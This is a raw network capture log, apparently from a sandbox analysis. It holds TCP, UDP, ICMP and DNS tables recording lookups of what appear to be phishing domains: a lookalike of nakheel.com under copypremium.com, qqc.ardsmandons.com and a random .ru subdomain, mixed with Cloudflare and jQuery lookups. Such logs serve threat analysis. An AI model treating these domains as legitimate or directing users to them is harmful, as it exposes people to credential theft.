                                                                                                                          Nov 25, 2024 16:43:37.123847008 CET4434984713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.211785078 CET4434984813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.212189913 CET49848443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.212204933 CET4434984813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.212625027 CET49848443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.212629080 CET4434984813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.630474091 CET4434984913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.630979061 CET49849443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.631032944 CET4434984913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.631553888 CET49849443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.631586075 CET4434984913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.662533998 CET4434984713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.662591934 CET4434984713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.662636995 CET49847443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.662807941 CET49847443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.662820101 CET4434984713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.662830114 CET49847443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.662834883 CET4434984713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.665472031 CET4434984813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.665613890 CET4434984813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.665669918 CET49848443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.665796995 CET49848443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.665816069 CET4434984813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.665829897 CET49848443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.665838003 CET4434984813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.666177988 CET49853443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.666204929 CET4434985313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.666259050 CET49853443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.666610003 CET49853443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.666626930 CET4434985313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.668145895 CET49854443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.668236017 CET4434985413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:37.668304920 CET49854443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.668453932 CET49854443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:37.668488026 CET4434985413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.089345932 CET4434984913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.089418888 CET4434984913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.089492083 CET49849443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:38.089951992 CET49849443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:38.089987993 CET4434984913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.090019941 CET49849443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:38.090034008 CET4434984913.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.093219042 CET49856443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:38.093247890 CET4434985613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.093305111 CET49856443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:38.093419075 CET49856443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:38.093430042 CET4434985613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.426340103 CET4434985013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.427422047 CET49850443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:38.427455902 CET4434985013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.428359032 CET49850443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:38.428365946 CET4434985013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.943659067 CET4434985213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.944327116 CET49852443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:38.944410086 CET4434985213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:38.944809914 CET49852443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:38.944828987 CET4434985213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.086786032 CET4434985013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.086863995 CET4434985013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.087106943 CET49850443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.087107897 CET49850443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.089373112 CET49850443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.089395046 CET4434985013.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.089904070 CET49862443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.089986086 CET4434986213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.090214014 CET49862443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.090214014 CET49862443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.090285063 CET4434986213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.407989979 CET4434985213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.408145905 CET4434985213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.408345938 CET49852443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.409416914 CET49852443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.409418106 CET49852443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.409460068 CET4434985213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.409487009 CET4434985213.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.415183067 CET49863443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.415227890 CET4434986313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.415359020 CET49863443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.417891026 CET49863443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.417907000 CET4434986313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.583498955 CET4434985313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.583976984 CET49853443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.583992004 CET4434985313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.586498976 CET49853443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.586503029 CET4434985313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.727624893 CET4434985413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.728615046 CET49854443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.728615046 CET49854443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.728665113 CET4434985413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.728689909 CET4434985413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.962488890 CET4434985613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.962986946 CET49856443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.963006020 CET4434985613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:39.963469028 CET49856443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:39.963474035 CET4434985613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.175458908 CET4434985313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.175534010 CET4434985313.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.175827026 CET49853443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.175827026 CET49853443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.175827026 CET49853443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.178582907 CET49866443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.178615093 CET4434986613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.178756952 CET49866443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.178910017 CET49866443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.178920031 CET4434986613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.252028942 CET4434985413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.252190113 CET4434985413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.252294064 CET49854443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.252373934 CET49854443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.252373934 CET49854443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.252418995 CET4434985413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.252450943 CET4434985413.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.255069017 CET49867443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.255114079 CET4434986713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.255220890 CET49867443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.255378008 CET49867443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.255393982 CET4434986713.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.482702017 CET4434985613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.482784033 CET4434985613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.482897997 CET49856443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.483077049 CET49856443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.483091116 CET4434985613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.483130932 CET49856443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.483135939 CET4434985613.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.485491037 CET49868443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.485522032 CET4434986813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.485647917 CET49868443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.485801935 CET49868443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.485819101 CET4434986813.107.246.63192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:40.491328955 CET49853443192.168.2.413.107.246.63
                                                                                                                          Nov 25, 2024 16:43:40.491333961 CET4434985313.107.246.63192.168.2.4
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Nov 25, 2024 16:42:18.059031010 CET53520671.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:18.066773891 CET53646401.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:19.999731064 CET5450053192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:19.999864101 CET6075353192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:21.002780914 CET53546641.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:21.161813974 CET53545001.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:21.162579060 CET53607531.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:22.325027943 CET6102653192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:22.325191021 CET5826453192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:22.466739893 CET53582641.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:22.466826916 CET53610261.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:22.962944031 CET5760053192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:22.963180065 CET6082453192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:23.234266043 CET53576001.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:23.234679937 CET53608241.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:26.918313026 CET5205753192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:26.919085026 CET5102553192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:26.919527054 CET5803653192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:26.919863939 CET5608553192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:26.920356035 CET5704653192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:26.920824051 CET5075653192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:27.062865973 CET53510251.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:27.063478947 CET53560851.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:27.063513994 CET53580361.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:27.063774109 CET53520571.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:27.065812111 CET53570461.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:27.074110985 CET53507561.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:29.173487902 CET6290053192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:29.173645020 CET5310853192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:29.266055107 CET6431953192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:29.266237974 CET5349553192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:29.318057060 CET53629001.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:29.318202019 CET53531081.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:29.403748989 CET53534951.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:29.404476881 CET53643191.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:30.895817995 CET5166853192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:30.895953894 CET5078653192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:30.936912060 CET6363853192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:30.937088966 CET5228453192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:31.040117979 CET53507861.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.040944099 CET53516681.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.081291914 CET53522841.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:31.081413031 CET53636381.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:36.220413923 CET138138192.168.2.4192.168.2.255
                                                                                                                          Nov 25, 2024 16:42:38.332031012 CET53543321.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.580358028 CET5889353192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:38.580516100 CET6518153192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:38.718224049 CET53588931.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:38.722209930 CET53651811.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:55.795797110 CET5039553192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:55.795952082 CET6517853192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:56.276629925 CET53651781.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:56.276844025 CET53503951.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:57.930665016 CET53599621.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:59.658499956 CET5948153192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:59.658636093 CET6449653192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:59.672421932 CET5601153192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:59.672827959 CET5113453192.168.2.41.1.1.1
                                                                                                                          Nov 25, 2024 16:42:59.811475992 CET53560111.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:42:59.811652899 CET53511341.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:17.903197050 CET53654571.1.1.1192.168.2.4
                                                                                                                          Nov 25, 2024 16:43:21.197033882 CET53647251.1.1.1192.168.2.4
                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                          Nov 25, 2024 16:42:18.153739929 CET192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable
                                                                                                                          Nov 25, 2024 16:43:30.740356922 CET192.168.2.41.1.1.1c263(Port unreachable)Destination Unreachable
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Nov 25, 2024 16:42:19.999731064 CET192.168.2.41.1.1.10x3760Standard query (0)nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:19.999864101 CET192.168.2.41.1.1.10xabf9Standard query (0)nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:22.325027943 CET192.168.2.41.1.1.10x591aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:22.325191021 CET192.168.2.41.1.1.10x7e39Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:22.962944031 CET192.168.2.41.1.1.10xf390Standard query (0)qqc.ardsmandons.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:22.963180065 CET192.168.2.41.1.1.10xd912Standard query (0)qqc.ardsmandons.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:26.918313026 CET192.168.2.41.1.1.10xdf9dStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:26.919085026 CET192.168.2.41.1.1.10xffdaStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:26.919527054 CET192.168.2.41.1.1.10xb37cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:26.919863939 CET192.168.2.41.1.1.10xaa45Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:26.920356035 CET192.168.2.41.1.1.10x55d7Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:26.920824051 CET192.168.2.41.1.1.10x9ee0Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:29.173487902 CET192.168.2.41.1.1.10x8604Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:29.173645020 CET192.168.2.41.1.1.10x534dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:29.266055107 CET192.168.2.41.1.1.10xf9acStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:29.266237974 CET192.168.2.41.1.1.10x63f2Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:30.895817995 CET192.168.2.41.1.1.10x6ddfStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:30.895953894 CET192.168.2.41.1.1.10x6daaStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:30.936912060 CET192.168.2.41.1.1.10x7308Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:30.937088966 CET192.168.2.41.1.1.10xf0c1Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:38.580358028 CET192.168.2.41.1.1.10x399Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:38.580516100 CET192.168.2.41.1.1.10xc87dStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:55.795797110 CET192.168.2.41.1.1.10x28ebStandard query (0)98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:55.795952082 CET192.168.2.41.1.1.10x709dStandard query (0)98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:59.658499956 CET192.168.2.41.1.1.10xb515Standard query (0)www.azure.comA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:59.658636093 CET192.168.2.41.1.1.10x24e3Standard query (0)www.azure.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:59.672421932 CET192.168.2.41.1.1.10x733aStandard query (0)98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:59.672827959 CET192.168.2.41.1.1.10x4693Standard query (0)98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Nov 25, 2024 16:42:21.161813974 CET1.1.1.1192.168.2.40x3760No error (0)nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com94.46.180.190A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:22.466739893 CET1.1.1.1192.168.2.40x7e39No error (0)www.google.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:22.466826916 CET1.1.1.1192.168.2.40x591aNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:23.234266043 CET1.1.1.1192.168.2.40xf390No error (0)qqc.ardsmandons.com172.67.177.19A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:23.234266043 CET1.1.1.1192.168.2.40xf390No error (0)qqc.ardsmandons.com104.21.17.158A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:23.234679937 CET1.1.1.1192.168.2.40xd912No error (0)qqc.ardsmandons.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:27.063478947 CET1.1.1.1192.168.2.40xaa45No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:27.063513994 CET1.1.1.1192.168.2.40xb37cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:27.063513994 CET1.1.1.1192.168.2.40xb37cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:27.063774109 CET1.1.1.1192.168.2.40xdf9dNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:27.063774109 CET1.1.1.1192.168.2.40xdf9dNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:27.063774109 CET1.1.1.1192.168.2.40xdf9dNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:27.063774109 CET1.1.1.1192.168.2.40xdf9dNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:27.065812111 CET1.1.1.1192.168.2.40x55d7No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:27.065812111 CET1.1.1.1192.168.2.40x55d7No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:27.074110985 CET1.1.1.1192.168.2.40x9ee0No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:29.318057060 CET1.1.1.1192.168.2.40x8604No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:29.318057060 CET1.1.1.1192.168.2.40x8604No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:29.318202019 CET1.1.1.1192.168.2.40x534dNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:29.404476881 CET1.1.1.1192.168.2.40xf9acNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:29.404476881 CET1.1.1.1192.168.2.40xf9acNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:29.404476881 CET1.1.1.1192.168.2.40xf9acNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:29.404476881 CET1.1.1.1192.168.2.40xf9acNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:31.040117979 CET1.1.1.1192.168.2.40x6daaNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:31.040944099 CET1.1.1.1192.168.2.40x6ddfNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:31.040944099 CET1.1.1.1192.168.2.40x6ddfNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:31.081291914 CET1.1.1.1192.168.2.40xf0c1No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:31.081413031 CET1.1.1.1192.168.2.40x7308No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:31.081413031 CET1.1.1.1192.168.2.40x7308No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:38.718224049 CET1.1.1.1192.168.2.40x399No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:56.276629925 CET1.1.1.1192.168.2.40x709dNo error (0)98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru65IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:56.276844025 CET1.1.1.1192.168.2.40x28ebNo error (0)98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:56.276844025 CET1.1.1.1192.168.2.40x28ebNo error (0)98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru172.67.189.38A (IP address)IN (0x0001)false
                                                                                                                          Nov 25, 2024 16:42:59.811475992 CET1.1.1.1192.168.2.40x733aNo error (0)98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru104.21.65.72A (IP address)IN (0x0001)false
